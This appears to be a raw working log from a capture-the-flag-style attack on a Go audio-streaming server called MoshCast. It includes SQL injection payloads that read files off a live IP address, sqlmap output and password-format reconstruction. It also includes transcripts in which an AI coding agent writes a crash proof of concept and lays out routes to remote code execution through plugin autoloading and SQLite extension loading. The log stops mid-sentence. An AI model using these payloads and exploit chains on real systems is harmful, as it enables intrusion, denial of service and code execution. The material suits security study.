  "Songs": [
	{
	  "Title": "6736096",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                          lo at kali (-)(main)
  --data-urlencode "date=' union all select hex(substr(readfile('/app/plugins/htmx.so'),1,8)), 59-- -A"
{
  "Songs": [
	{
	  "Title": "7F454C4602010100",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

// weak pass

~/shared/moshcast/mosh > ipython3                                                                                                                                           kingjulien at central-park-zoo (-)(main)
Python 3.11.2 (main, Sep 14 2024, 03:00:30) [GCC 12.2.0]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.5.0 -- An enhanced Interactive Python. Type '?' for help.
[TerminalIPythonApp] WARNING | File not found: '/home/kingjulien/.pythonrc'

In [1]: len("ba1f2511fc30423bdbb183fe33f3dd0f")
Out[1]: 32

In [2]: len("admin_ulmageddon@moshzilla.rocks") + len("ba1f2511fc30423bdbb183fe33f3dd0f")
Out[2]: 64

In [3]: len("admin_ulmageddon@moshzilla.rocks") + len("ba1f2511fc30423bdbb183fe33f3dd0f") + len(13373683)
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
Cell In [3], line 1
----> 1 len("admin_ulmageddon@moshzilla.rocks") + len("ba1f2511fc30423bdbb183fe33f3dd0f") + len(13373683)

TypeError: object of type 'int' has no len()

In [4]: len("admin_ulmageddon@moshzilla.rocks") + len("ba1f2511fc30423bdbb183fe33f3dd0f") + len(str(13373683))
Out[4]: 72



func GenerateSalt() string {
	return fmt.Sprintf("%d", 13370000+rand.Intn(9999))
}

func GeneratePasswordHash(username, password, salt string) string {
	genPassword := GeneratePasswordString(username, password, salt)
	hash, err := bcrypt.GenerateFromPassword([]byte(genPassword), bcrypt.DefaultCost)
	if err != nil {
		log.Fatal(err)
	}
	return string(hash)
}

func GeneratePasswordString(username, password, salt string) string {
	return func(s string) string {
		if len(s) > 0x48 {
			return s[:0x48]
		}
		return s
	}(fmt.Sprintf("%s:%s:%s:%s", username, getMD5Hash(username), salt, password))
}



----



echo -n "admin_ulmageddon@moshzilla.rocks" | md5sum                    kingjulien at central-park-zoo
1300b4cc8a95daa56878000b6d57ec78  -

In [6]: len("admin_ulmageddon@moshzilla.rocks:1300b4cc8a95daa56878000b6d57ec78:13373683")
Out[6]: 74


u:  admin_ulmageddon@moshzilla.rocks

admin_ulmageddon@moshzilla.rocks:1300b4cc8a95daa56878000b6d57ec78:133736
admin_ulmageddon@moshzilla.rocks:1300b4cc8a95daa56878000b6d57ec78:13373683

~/shared/moshcast > codex 'can you explain the api endpoints in mosh/server.go, specifically these: for _, mnt := range i.Options.Mounts {
    3 ▏   ▏   r.HandleFunc("/"+mnt.Name, mnt.write).Methods("SOURCE", "PUT")
    2 ▏   ▏   r.HandleFunc("/"+mnt.Name, mnt.read).Methods("GET")
    1 ▏   ▏   r.Path("/admin/metadata").Queries("mode", "updinfo", "mount", "/"+mnt.Name).HandlerFunc(mnt.      meta).Methods("GET")'

✨⬆️ Update available! 0.29.0 -> 0.42.0.
Run npm install -g @openai/codex@latest to update.

>_ You are using OpenAI Codex in ~/shared/moshcast

 To get started, describe a task or try one of these commands:

 /init - create an AGENTS.md file with instructions for Codex
 /status - show current session configuration and token usage
 /approvals - choose what Codex can do without approval
 /model - choose what model and reasoning effort to use

▌can you explain the api endpoints in mosh/server.go, specifically these: for _, mnt := range
▌i.Options.Mounts {
▌    3 ▏   ▏   r.HandleFunc("/"+mnt.Name, mnt.write).Methods("SOURCE", "PUT")
▌    2 ▏   ▏   r.HandleFunc("/"+mnt.Name, mnt.read).Methods("GET")
▌    1 ▏   ▏   r.Path("/admin/metadata").Queries("mode", "updinfo", "mount",
▌"/"+mnt.Name).HandlerFunc(mnt.      meta).Methods("GET")

> I’ll scan the repo and open mosh/server.go to examine those route definitions and related handlers.

• Ran bash -lc "rg -n \"package mosh|server.go|Router|HandleFunc\\(|Path\\(\" -S" -- '' ''

• Explored
  └ Read server.go, mount.go
    Search func \(m \*mount\) read\( in mount.go
    Read mount.go
    Read handlers.go, config.go, sql.go

> Here’s what those three routes do. They’re registered once per configured mount (i.Options.Mounts), so
  each mount gets its own set.

  Routes

  - /<mount> with methods SOURCE, PUT: Accepts an incoming “source” (encoder) pushing the audio stream
  into this mount.
      - Auth: HTTP Basic required via Authorization header (mnt.auth). Users are validated against the
  SQLite users table.
      - Headers used: ice-bitrate or ice-audio-info, ice-genre, content-type, ice-description (parsed in
  mnt.writeICEHeaders) to set mount bitrate, content type, etc.
      - Behavior: Hijacks the connection, reads raw audio bytes, and appends them into a ring buffer
  (mnt.buffer). Only one source per mount; returns 403 if a source is already connected. Enforces global
  source limit (Options.Limits.Sources).
      - Response: On successful auth, immediately writes 200 with keep-alive headers (mnt.saySourceHello)
  and then streams data ingestion.
      - Response: On successful auth, immediately writes 200 with keep-alive headers (mnt.saySourceHello)
  and then streams data ingestion.
  -
  /<mount> with method GET: Serves the live audio stream to listeners.
      - Auth: None for listening.
      - Optional ICY metadata: If the request header icy-metadata: 1 is present, the server injects ICY
  metadata blocks every MetaInt bytes (computed as bitrate*1024/8*10, i.e., roughly every 10 seconds of
  audio).
      - Behavior: Hijacks the connection and continuously writes from the mount’s buffer. Sends “burst”
  data up to BurstSize for fast start, then throttles to real time. Tracks listener counts and enforces
  limit (Options.Limits.Clients), timeouts (WriteTimeOut, EmptyBufferIdleTimeOut).
      - Response headers: Includes Content-Type, X-Audiocast-* headers; if ICY is requested, adds
  Icy-Metaint.
  -
  /admin/metadata?mode=updinfo&mount=/<mount> with method GET: Updates the current ICY stream title (“now
  playing”) for the mount.
      - Route match: The Gorilla Queries matcher requires exactly mode=updinfo and mount=/mountname. Any
  other values won’t hit this handler.
      - Auth: HTTP Basic required (same as for source). On success, it returns 200 with keep-alive headers
  and no body.
      - Input: Reads the song query parameter; auto-detects/decodes its charset to UTF‑8.
      - Behavior: Sets mnt.State.MetaInfo.StreamTitle, builds an ICY metadata block (first byte is length
  in 16‑byte units, then the StreamTitle='…'; payload padded to a 16‑byte boundary), and stores it for
  injection into listener streams that requested metadata. Also persists the title with a timestamp into
  the meta table (SQL.InsertMetaData).
      - Effect on clients: Subsequent listeners with icy-metadata: 1 receive the updated title at the next
  metadata interval.

  Notes

  - Paths are exact (StrictSlash(true)) and registered per mount name from config.
  - The server also exposes GET /meta.json, GET /info, and GET /info.json plus static files via
  PathPrefix("/"), but those are separate from the three mount-specific routes above.

▌where is the basic auth credentials from?

• Explored
  └ Search package utils|GenerateSalt|GeneratePassword in utils
    Read utils.go, api.go, config.yaml

> - Credentials source: Stored in the SQLite DB defined by Auth.DBFile in config.yaml (e.g., data/
  data.db).
  - Table: users (username TEXT UNIQUE, password TEXT, salt TEXT) created by SQL.CreateTable in mosh/
  sql.go.
  - Verification flow: mnt.auth (in mosh/mount.go) reads the Authorization header, decodes user:pass, then
  calls SQL.Authentication, which:
      - Looks up password and salt for username.
      - Recomputes the candidate string as username:md5(username):salt:password (truncated to 0x48 bytes)
  via utils.GeneratePasswordString.
      - Compares it with the stored bcrypt hash using bcrypt.CompareHashAndPassword.
  - Affected endpoints: /<mount> with SOURCE/PUT and /admin/metadata?mode=updinfo&mount=/<mount> both
  require Basic auth; GET /<mount> does not.
  - User provisioning: There’s a helper SQL.InsertUser(username, password) that generates a salt and
  bcrypt hash. Note: it currently calls INSERT INTO users (username, password, salt) VALUES (?, ?, ?) but
  only supplies two parameters — this needs fixing or you should insert with all three fields yourself.

▌can you give me a curl example for the UlmAgeddon method

🖐  Tell the model what to do differently

▌can you give me a curl example for the PUT method

> Here are working curl snippets for both the SOURCE/UlmAgeddon and PUT variants to push audio to a mount
  (replace creds, host, and mount as needed).

  PUT (upload a file)

  - File upload: -T uses PUT automatically.
  - Example:
  curl -v -u sourceUser:sourcePass -H "Content-Type: audio/mpeg" -H "ice-bitrate: 128" -H "ice-genre:
  Rock" -H "ice-description: My Stream" -T ./song.mp3 http://127.0.0.1:9080/Example

  PUT (live pipe via ffmpeg)

  - Stream from ffmpeg over PUT:
  ffmpeg -re -i input.wav -c:a libmp3lame -b:a 128k -f mp3 - | curl -v -u sourceUser:sourcePass -H
  "Content-Type: audio/mpeg" -H "ice-bitrate: 128" -H "ice-genre: Rock" -H "ice-description: My Stream" -X
  PUT --data-binary @- http://127.0.0.1:9080/Example

  SOURCE (aka “UlmAgeddon” method)

  - Same as above but using the SOURCE verb:
  ffmpeg -re -i input.wav -c:a libmp3lame -b:a 128k -f mp3 - | curl -v -u sourceUser:sourcePass -H
  "Content-Type: audio/mpeg" -H "ice-bitrate: 128" -H "ice-genre: Rock" -H "ice-description: My Stream" -X
  SOURCE --data-binary @- http://127.0.0.1:9080/Example

  Update ICY metadata (now playing)

  - Requires the same Basic auth:
  curl -v -u sourceUser:sourcePass "http://127.0.0.1:9080/admin/metadata?mode=updinfo&mount=/
  Example&song=Artist%20-%20Title"

  Notes

  - Example is the mount name from config; path is /Example.
  - The user/password must exist in the SQLite users table configured by Auth.DBFile.

▌is there a way this could potentially lead to RCE?

> I’m going to scan the codebase for any places where untrusted input reaches dynamic execution, shell,
  plugins, or template functions that could be abused for RCE. Then I’ll summarize realistic RCE vectors
  and mitigations.

• Explored
  └ Search exec\(|Command\(|plugin\.Open|os\.|ioutil\.|template|LoadPlugins|http\.Hijack|hijack|json\.|
           yaml|ParseFiles|Query\(|Exec\(|Prepare\(|sprintf\(|Sprintf\(|WriteFile|ReadFile|OpenFile|
           Lookup|LookupEnv|Eval|cgo|LD_PRELOAD|ListenAndServe|ServeHTTP|chmod|chown|mktemp|WriteString|
           fmt\.Fprintf|go\s+run|go\s+build
    Read main.go, yolo.go, fshook.go

> Short answer: Not directly via these APIs. The PUT/SOURCE upload and /admin/metadata endpoints only
  ingest bytes and update in‑memory metadata; they do not execute user input as code or shell.

  That said, here are realistic RCE-adjacent risks to watch:

  -
  Plugins directory loading: The server loads every .so in Paths.Plugins at startup via plugin.Open and
  runs Init().Process(). If an attacker can write a shared object into that directory (misconfigured
  perms, compromised deploy pipeline, or mounting an untrusted path), this is immediate code execution.
  Mitigate by disabling plugins in prod, locking down FS perms, and treating the plugins directory as
  highly trusted only.
  -
  Dump file + plugins combo: If an operator misconfigures a mount DumpFile to point inside the plugins
  directory and later restarts the server, a valid attacker-supplied .so could be auto-loaded. It’s
  unlikely a live audio stream yields a valid ELF .so, but an attacker controlling the source could stream
  a crafted payload if they also influence that path. Keep DumpFile out of plugin dirs and restrict write
  perms.
  -
  SQLite extension abuse (theoretical): RCE via SQLite typically requires load_extension to be enabled and
  an injection point to call it. The code does not enable extension loading, and the injection surface is
  low, but SelectMetaData concatenates the date parameter into SQL. While a naive filter is applied, it’s
  not robust. Use prepared statements and ensure extension loading remains disabled.
  -
  Header injection → client-side code execution: The server writes raw HTTP headers over a hijacked
  connection using values taken from source-controlled headers (content-type, ice-genre, ice-description).
  If a malicious source includes CRLFs, this can lead to HTTP response splitting and client-side exploits
  (not server RCE). Sanitize by stripping \r/\n from these fields or enforcing safe character sets before
  writing, or set headers via http.ResponseWriter (which validates) and avoid manual header composition.

  What is safe here

  - No shelling out, no template execution of user-supplied templates, and no deserialization of untrusted
  data into executable contexts.
  - Basic Auth verification uses bcrypt; credentials are checked against SQLite and never executed.

  If you want, I can:

  - Patch SelectMetaData to use a prepared statement.
  - Sanitize header fields before sayHello writes them.
  - Add a config flag to disable plugin loading in production and fail closed if the directory is writable
  by non-owner.

▌is there a way to crash the applicatoin using one of the admin endpoints and force a restart?

> Yes — authenticated users can crash it via the admin metadata endpoint by sending an overlong song
  title, which triggers a slice-bounds panic that the middleware interprets as “index out of range” and
  then calls os.Exit(1). If the service is supervised (e.g., Docker with restart policy), this forces
  a restart.

  What happens

  - Endpoint: GET /admin/metadata?mode=updinfo&mount=/MountName&song=...
  - In mount.meta, the code:
      - Computes metaSize as a byte: ceil(len(song)/16).
      - Allocates a buffer sized int(metaSize)*16 + 1.
      - Copies the whole song into that buffer.
  - If len(song) >= 4081, ceil(len/16) becomes 256, which overflows the 1‑byte metaSize to 0. The buffer
  is allocated with length 1, then the copy loop writes past the end → panic: index out of range. The
  middleware sees “index out of range” and calls os.Exit(1).

  Requirements

  - Basic auth is required; without valid credentials meta returns early. Note: on auth failure it still
  writes a 200 with headers, but does not reach the vulnerable code.

  PoC curl

  - Bash one-liner to generate a 5000‑byte title and crash:
  SONG=$(printf 'A%.0s' {1..5000}); curl -v -u sourceUser:sourcePass "http://127.0.0.1:9080/admin/
  metadata?mode=updinfo&mount=/Example&song=${SONG}"

  Fix

  - Enforce ICY metadata limit (255 blocks × 16 = 4080 bytes):
      - Clamp blocks: blocks := int(math.Ceil(float64(len(mStr))/16.0)); if blocks > 255 { blocks = 255 }
      - Allocate with blocks*16 + 1.
      - Copy at most blocks*16 bytes: copy(m.State.MetaInfo.meta[1:], mStr).
      - Or reject with 400 when len(song) > 4080.

https://github.com/wagoodman/dive

dive moshzillaradio/moshcast
Image Source: docker://moshzillaradio/moshcast
Extracting image from docker-engine... (this can take a while for large images)
Analyzing image...
Building cache...

strings htmx.so | grep utils.Init                        kingjulien at central-park-zoo
go:itab.*plugin/unnamed-34b5cc1b22f8ca5b26bcc964d8142bce78a97005.Bunny,moshcast/utils.Init
*utils.Init
*func() utils.Init
go:itab.*plugin/unnamed-34b5cc1b22f8ca5b26bcc964d8142bce78a97005.Bunny,moshcast/utils.Init

~/shared/asdf/qwer > sqlmap -u "http://46.101.222.148:8080/meta.json?date=asdf" --random-agent --sql-query="SELECT name FROM pragma_function_list WHERE builtin = 0 ORDER BY name"                                                 lo at kali
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:41:47 /2025-09-30/

[19:41:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092813 Gentoo Firefox/3.0.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:41:47] [INFO] resuming back-end DBMS 'sqlite'
[19:41:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: date (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: date=asdf' UNION ALL SELECT CONCAT(CONCAT('qjppq','BuHKQYTbNQNYTcRYKLLbZZmLZRQFiZHTSpPnvNCl'),'qqpjq'),59-- ZNmU
---
[19:41:48] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[19:41:48] [INFO] fetching SQL SELECT statement query output: 'SELECT name FROM pragma_function_list WHERE builtin = 0 ORDER BY name'
SELECT name FROM pragma_function_list WHERE builtin = 0 ORDER BY name [17]:
[*] auth_enabled
[*] auth_user_add
[*] auth_user_change
[*] auth_user_delete
[*] authenticate
[*] fts3_tokenizer
[*] lsmode
[*] match
[*] matchinfo
[*] offsets
[*] optimize
[*] readfile
[*] rtreecheck
[*] rtreedepth
[*] rtreenode
[*] snippet
[*] writefile


SELECT name FROM pragma_module_list [11]:
[*] fsdir
[*] fts3
[*] fts3tokenize
[*] fts4
[*] fts4aux
[*] json_each
[*] json_tree
[*] pragma_function_list
[*] pragma_module_list
[*] rtree
[*] rtree_i32

back-end DBMS: SQLite
[19:43:30] [INFO] fetching SQL SELECT statement query output: 'SELECT name FROM pragma_collation_list'
SELECT name FROM pragma_collation_list [3]:
[*] BINARY
[*] NOCASE
[*] RTRIM

[19:43:30] [INFO] fetched data logged to text files under '/home/lo/.local/share/sqlmap/output/46.101.222.148'

Enter ".help" for usage hints.
sqlite> INSERT
Display all 160 possibilities? (y or n)
sqlite> INSERT INTO users (username, password, salt)
VALUES ('admin_ulmageddon@moshzilla.rocks', '$2a$10$olXgAnM2AvhswolWCD7fqOjDQ261uFC5d7ZhE/FbB3FxupVuBKGeK', '13373683');
sqlite>

/app # ls
Dockerfile          config.yaml         docker-compose.yml  go.sum              log                 mosh                plugins             templates           vendor
Makefile            data                go.mod              html                main.go             moshcast            pool                utils
/app # sqlite3 data/data.db
SQLite version 3.48.0 2025-01-14 11:05:00
Enter ".help" for usage hints.
sqlite> select * from users;
3|admin_ulmageddon@moshzilla.rocks|$2a$10$olXgAnM2AvhswolWCD7fqOjDQ261uFC5d7ZhE/FbB3FxupVuBKGeK|13373683
sqlite>

app # cat config.yaml
Name: Radio Station
Admin: admin@localhost
Location: Internet
Host: 127.0.0.1
Socket:
  Port: 9080

Limits:
  Clients: 1000
  Sources: 50
  SourceIdleTimeOut: 10
  EmptyBufferIdleTimeOut: 5
  WriteTimeOut: 10

Auth:
  DBFile: data/data.db

Paths:
  Log: /tmp/
  Web: html/
  Plugins: plugins/

Logging:
  LogLevel: 4
  LogSize: 50000
  StatInterval: 5

Mounts:
  - Name: Example
    Genre: Genre
    Description: Radio Station
    BitRate: 128
    BurstSize: 65535
    DumpFile:
/app # ./moshcast
2025/09/30 23:56:58 MoshCast 1.0.0
2025/09/30 23:56:58 Started on :9080
2025/09/30 23:57:29 User admin_ulmageddon@moshzilla.rocks logged in
2025/09/30 23:57:29 runtime error: index out of range [1] with length 1
/app #


	~/shared/asdf/qwer > curl -v -u "admin_ulmageddon@moshzilla.rocks":"admin_ulmageddon@moshzilla.rocks:1300b4cc8a95daa56878000b6d57e8:133736" "http://localhost:9080/admin/metadata?mode=updinfo&mount=/Example&song=$(head -c 4066 /dev/zero | tr '\0' 'A')"
* Host localhost:9080 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:9080...
* Connected to localhost (::1) port 9080
* using HTTP/1.x
* Server auth using Basic with user 'admin_ulmageddon@moshzilla.rocks'
> GET /admin/metadata?mode=updinfo&mount=/Example&song=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
> Host: localhost:9080
> Authorization: Basic YWRtaW5fdWxtYWdlZGRvbkBtb3NoemlsbGEucm9ja3M6YWRtaW5fdWxtYWdlZGRvbkBtb3NoemlsbGEucm9ja3M6MTMwMGI0Y2M4YTk1ZGFhNTY4NzgwMDBiNmQ1N2U4OjEzMzczNg==
> User-Agent: curl/8.14.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Allow: GET, SOURCE
< Cache-Control: no-cache
< Connection: Keep-Alive
< Pragma: no-cache
< Server: MoshCast/1.0.0
< Date: Tue, 30 Sep 2025 23:57:29 GMT
< Transfer-Encoding: chunked
<
* transfer closed with outstanding read data remaining
* closing connection #0
curl: (18) transfer closed with outstanding read data remaining

./test.sh other


curl -v -u "admin_ulmageddon@moshzilla.rocks":"admin_ulmageddon@moshzilla.rocks:1300b4cc8a95daa56878000b6d57e8:133736" "http://localhost:9080/admin/metadata?mode=updinfo&mount=/Example&song=$(head -c 4066 /dev/zero | tr '\0' 'A')"

~/shared/moshcast > codex 'I have this application. Assuming an attacker has admin credentials and can access all routes as well as upload files to the application, how can he leverage this to gain RCE?'

✨⬆️ Update available! 0.29.0 -> 0.42.0.
Run npm install -g @openai/codex@latest to update.

>_ You are using OpenAI Codex in ~/shared/moshcast

 To get started, describe a task or try one of these commands:

 /init - create an AGENTS.md file with instructions for Codex
 /status - show current session configuration and token usage
 /approvals - choose what Codex can do without approval
 /model - choose what model and reasoning effort to use

▌I have this application. Assuming an attacker has admin credentials and can access all routes as well as
▌upload files to the application, how can he leverage this to gain RCE?

🖐  Tell the model what to do differently

▌continue

> I’ll scan the repo for upload handling and dangerous sinks next.

• Explored
  └ List ls -la
    Search FormFile|multipart|Upload|upload|exec\.Command|plugin|template|Shell|bash|sh\(
    Read utils.go
    Search type +Init|interface +Init|Init\)\(\)
    Read api.go
    Search LoadPlugins\(|pluginDir|Plugins
    Read main.go, handlers.go, sql.go, server.go, mount.go
    Search POST\(|Methods\(\"POST|multipart|FormFile|WriteFile|Save|Upload|upload|create\(.*os\.|
           os\.Create|io\.Copy\(|ReadAll\(r\.Body|r\.Body|ioutil\.ReadAll\(
    Read yolo.go
    Search NewFsHook|FsHook|PathPrefix|Paths.Web|serve|FileServer|Write|PUT|SOURCE|DELETE|UPLOAD|save -i
    Read fshook.go, mount.go, config.yaml, log.go, go.mod, config.go

> Here’s how an attacker with admin access and write/upload capability could reach RCE in this codebase.

  Likely RCE Paths

  - Plugin autoload: utils.LoadPlugins loads every .so under Paths.Plugins and immediately calls
  Init().Process(). If the attacker can place a compiled Go plugin .so into plugins/ and the app restarts
  (plugins are loaded at startup), arbitrary code runs inside the server process.
  - SQLi → SQLite extension loading: /meta.json builds a SQL string with date directly concatenated
  (mosh/sql.go::SelectMetaData). The driver github.com/MoshZillaRadio/go-sqlite3-ext typically
  enables SQLite extensions. With file write access, an attacker can upload a shared object and
  use a crafted date value to invoke load_extension() in the SELECT context, causing the DB to load
  and execute the uploaded extension. This does not require semicolons or comments, and the current
  “sanitizer” (utils.CheckUserInput) does not prevent it.
  - Forced restart to reload plugins: The middleware exits the process on certain panics containing “index
  out of range”. If the service is supervised (e.g., Docker), a crafted request that triggers such a panic
  can force a restart and plugin reload, executing any attacker-planted .so under plugins/.

  Why These Work

  - Plugin loader: plugin.Open + Lookup("Init") + Process() is effectively “execute arbitrary code from
  any .so in this directory”. With upload/write access to plugins/, this is game over once plugins are
  loaded.
  - SQLi: The query uses string concatenation and only blocks “;”, “/*”, and “ --”. Attackers can still
